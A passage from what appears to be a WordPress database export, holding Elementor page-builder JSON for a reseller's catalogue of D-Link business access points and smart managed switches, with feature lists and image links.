WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"150\",\"bottom\":\"150\",\"left\":\"150\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7396,3385,'_elementor_version','2.5.14'),(7397,3385,'_elementor_edit_mode','builder'),(7400,3386,'_wp_page_template','template-fullwidth.php'),(7401,3386,'_elementor_template_type','post'),(7402,3386,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"158\",\"right\":\"158\",\"bottom\":\"158\",\"left\":\"158\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 